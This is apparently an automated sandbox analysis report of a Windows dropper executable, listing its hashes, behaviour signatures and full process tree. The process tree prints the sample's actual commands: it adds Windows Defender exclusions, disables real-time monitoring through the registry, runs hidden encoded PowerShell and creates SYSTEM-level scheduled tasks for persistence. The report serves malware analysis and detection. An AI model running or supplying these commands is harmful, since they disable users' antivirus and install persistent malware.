Analysis
-
max time kernel
185s -
max time network
190s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
-
submitted
01-07-2024 05:01
General
-
Target
1f965d2f5cd11d6432f652f7ff1c6b3549dc247aac6042d84be28a836299bf35.exe
-
Size
7.3MB
-
MD5
b52980fec56edf878e3e0ebc68d3ac9e
-
SHA1
91d197eef6cd2212cfca5b69cd415981439c6840
-
SHA256
1f965d2f5cd11d6432f652f7ff1c6b3549dc247aac6042d84be28a836299bf35
-
SHA512
2fd342aec6d67aef44749e045b7fb81dbce4bbd8f02e05cc303cb6a14855f9801af3d04a48a5732bf0c121ac67cf9c6d6b70eabf51df5537c8e4243932a7bc56
-
SSDEEP
98304:91OgSvLXE7jnk0q77e+LkLJ0fxksJ6mXEdi/zvSTC5Kgr+/feiQNeFznL9zB3sFd:91OgK0Pnr/+cJKvuMK+K0UFznLthcg4
Score
10/10
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
Windows security bypass 2 TTPs 40 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 23 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
-
Drops file in System32 directory 24 IoCs
-
Drops file in Program Files directory 13 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 30 IoCs
-
Suspicious use of AdjustPrivilegeToken 63 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\1f965d2f5cd11d6432f652f7ff1c6b3549dc247aac6042d84be28a836299bf35.exe"C:\Users\Admin\AppData\Local\Temp\1f965d2f5cd11d6432f652f7ff1c6b3549dc247aac6042d84be28a836299bf35.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS79F.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS9E0.tmp\Install.exe.\Install.exe /ckOdidYe "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bUVDAOPnPkUhchiViu" /SC once /ST 05:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON\QIyULnqRsjUxkcq\yUrVPAd.exe\" q7 /OnFdidiz 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 5084⤵
- Loads dropped DLL
- Program crash
-
C:\Windows\system32\taskeng.exetaskeng.exe {6C05789B-B690-4828-8399-1DC7EC795C5E} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON\QIyULnqRsjUxkcq\yUrVPAd.exeC:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON\QIyULnqRsjUxkcq\yUrVPAd.exe q7 /OnFdidiz 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "glUUVAbFk" /SC once /ST 02:23:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "glUUVAbFk"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "glUUVAbFk"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gSmKSQqSA" /SC once /ST 00:11:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gSmKSQqSA"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gSmKSQqSA"3⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\WZpWNMsDzSAcKsSA\YpxQpBsK\ekduWzVPfypDrZBU.wsf"3⤵
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\WZpWNMsDzSAcKsSA\YpxQpBsK\ekduWzVPfypDrZBU.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MIUMVdEgyTUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MIUMVdEgyTUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NNMAoTKMcAkAC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NNMAoTKMcAkAC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bBBSFQQZU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bBBSFQQZU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rPikKiIbwrQGukIChiR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rPikKiIbwrQGukIChiR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rUfZlqUIdWiU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rUfZlqUIdWiU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fHdtCMTPryqSDgVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fHdtCMTPryqSDgVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MIUMVdEgyTUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MIUMVdEgyTUn" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NNMAoTKMcAkAC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NNMAoTKMcAkAC" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bBBSFQQZU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bBBSFQQZU" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rPikKiIbwrQGukIChiR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rPikKiIbwrQGukIChiR" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rUfZlqUIdWiU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rUfZlqUIdWiU2" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fHdtCMTPryqSDgVB" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fHdtCMTPryqSDgVB" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gSXidjIdv" /SC once /ST 02:47:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gSXidjIdv"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gSXidjIdv"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MhsnVFKWmmyXGZkTD" /SC once /ST 00:48:59 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WZpWNMsDzSAcKsSA\JdHzeCSmzFzWXve\jFXNTIL.exe\" DG /ASTvdidBR 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "MhsnVFKWmmyXGZkTD"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2568 -s 4883⤵
- Loads dropped DLL
- Program crash
-
C:\Windows\Temp\WZpWNMsDzSAcKsSA\JdHzeCSmzFzWXve\jFXNTIL.exeC:\Windows\Temp\WZpWNMsDzSAcKsSA\JdHzeCSmzFzWXve\jFXNTIL.exe DG /ASTvdidBR 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bUVDAOPnPkUhchiViu"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\bBBSFQQZU\aOIOcW.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "LVynAQLCTpGcVPg" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LVynAQLCTpGcVPg2" /F /xml "C:\Program Files (x86)\bBBSFQQZU\cJShuxr.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "LVynAQLCTpGcVPg"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "LVynAQLCTpGcVPg"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KatXkYONgJxXkD" /F /xml "C:\Program Files (x86)\rUfZlqUIdWiU2\EoqhHtL.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PuJMQwokvjmjr2" /F /xml "C:\ProgramData\fHdtCMTPryqSDgVB\dklcvEh.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jmhuFmncXBbhpBxSq2" /F /xml "C:\Program Files (x86)\rPikKiIbwrQGukIChiR\xjRusjO.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OztlfTauKwYVOQQXHnj2" /F /xml "C:\Program Files (x86)\NNMAoTKMcAkAC\EVwNPJE.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MRaTohzfdszDuijXP" /SC once /ST 03:38:08 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WZpWNMsDzSAcKsSA\BupCloOy\kNXfDAH.dll\",#1 /vPddidfn 525403" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "MRaTohzfdszDuijXP"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MhsnVFKWmmyXGZkTD"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 15243⤵
- Loads dropped DLL
- Program crash
-
